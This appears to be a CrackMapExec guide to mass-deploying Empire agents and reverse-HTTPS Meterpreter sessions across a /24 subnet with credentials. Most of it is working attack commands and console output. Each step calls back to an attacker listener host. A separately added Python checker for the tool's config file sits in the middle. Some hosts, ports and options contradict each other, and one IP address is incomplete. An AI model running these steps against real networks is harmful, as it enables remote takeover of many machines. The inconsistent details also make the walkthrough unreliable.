Getting Shells 101
We all love shells, and that's why CME makes it as easy as possible to get them! There really is something magical about shelling a /24.

Empire Agent

Use the new Python 3 Empire: https://github.com/BC-SECURITY/Empire
We can use the empire_exec module to execute an Empire agent's initial stager. In the background, the module connects to Empire's RESTful API, generates a launcher for the specified listener and executes it on the target.
  • First, set up the REST API:

```
#~ python powershell-empire --rest --user empireadmin --pass Password123!
[*] Loading modules from: /home/byt3bl33d3r/Tools/Empire/lib/modules/
* Starting Empire RESTful API on port: 1337
* RESTful API token: l5l051eqiqe70c75dis68qjheg7b19di7n8auzml
* Running on https://0.0.0.0:1337/ (Press CTRL+C to quit)
```
  • Second, set up a listener:

```
(Empire: listeners) > set Name test
(Empire: listeners) > set Host 192.168.10.3
(Empire: listeners) > set Port 9090
(Empire: listeners) > set CertPath data/empire.pem
(Empire: listeners) > run
(Empire: listeners) > list

[*] Active listeners:

ID Name Host                     Type   Delay/Jitter KillDate Redirect Target
-- ---- ----                     ------ ------------ -------- ---------------
1  test http://192.168.10.3:9090 native 5/0.0

(Empire: listeners) >
```
The username and password that CME uses to authenticate to Empire's RESTful API are stored in the cme.conf file located at ~/.cme/cme.conf:

```
[Empire]
api_host=127.0.0.1
api_port=1337
username=empireadmin
password=Password123!

[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123
```
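Because cme.conf holds the plaintext credentials for both the Empire REST API and the Metasploit RPC service, it is worth sanity-checking before a run. The following is an added example, not CME's own code: it parses the INI layout shown above (the embedded sample is constructed to mirror it) and reports missing keys, non-numeric ports, passwords left at the documentation's example values, and API hosts that are not loopback.

```python
import configparser
from typing import Dict, List

# Constructed sample mirroring the ~/.cme/cme.conf layout shown on this page.
SAMPLE_CME_CONF = """
[Empire]
api_host=127.0.0.1
api_port=1337
username=empireadmin
password=Password123!

[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123
"""

# Keys each section needs, taken from the sample config above.
REQUIRED_KEYS = {
    "Empire": ["api_host", "api_port", "username", "password"],
    "Metasploit": ["rpc_host", "rpc_port", "password"],
}
# Values copied straight from the documentation example; they should not stay in use.
DOC_EXAMPLE_SECRETS = {"Password123!", "abc123"}
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def check_cme_conf(text: str) -> Dict[str, List[str]]:
    """Parse cme.conf text and return a list of findings per section."""
    cfg = configparser.ConfigParser()
    cfg.read_string(text)
    findings: Dict[str, List[str]] = {}
    for section, keys in REQUIRED_KEYS.items():
        if not cfg.has_section(section):
            findings[section] = ["section missing"]
            continue
        issues: List[str] = [f"missing {k}" for k in keys if not cfg.has_option(section, k)]
        for port_key in ("api_port", "rpc_port"):
            if cfg.has_option(section, port_key) and not cfg.get(section, port_key).isdigit():
                issues.append(f"{port_key} is not numeric")
        if cfg.get(section, "password", fallback="") in DOC_EXAMPLE_SECRETS:
            issues.append("password is a documentation example value")
        # The API password is sent to this host, so anything beyond loopback widens exposure.
        host = cfg.get(section, "api_host", fallback=cfg.get(section, "rpc_host", fallback="127.0.0.1"))
        if host not in LOOPBACK:
            issues.append(f"API host {host} is not loopback")
        findings[section] = issues
    return findings
```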
  • Then just run the empire_exec module and specify the listener name:

```
#~ crackmapexec 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test
```

Meterpreter

We can use the met_inject module to launch a Meterpreter session using the Invoke-MetasploitPayload.ps1 script.
On your Metasploit instance, run the following commands:

```
use exploit/multi/script/web_delivery
```

The SRVHOST and SRVPORT variables configure the web server that hosts the script:

```
set SRVHOST 10.211.55
set SRVPORT 8443
```

The target variable determines what type of script we're using; 2 is for PowerShell:

```
set target 2
```

Pick your payload. In this case, we'll use a reverse HTTPS Meterpreter payload:

```
set payload windows/meterpreter/reverse_https
set LHOST 10.211.55
set LPORT 443
```

Run the exploit:

```
run -j
```
Once run, the web_delivery module will spin up the web server that hosts the script and the reverse listener for our Meterpreter session.

```
msf exploit(web_delivery) > run -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://10.211.55.4:8443/
[*] Using URL: http://10.211.55.4:8080/eYEssEwv2D
[*] Local IP: http://10.211.55.4:8080/eYEssEwv2D
[*] Server started.
```

  • Then just run the met_inject module, passing it the web_delivery server details (SRVHOST, SRVPORT, the random URL path as RAND, and SSL):

```
#~ crackmapexec 192.168.10.0/24 -u username -p password -M met_inject -o SRVHOST=192.168.10.3 SRVPORT=8443 RAND=eYEssEwv2D SSL=http
```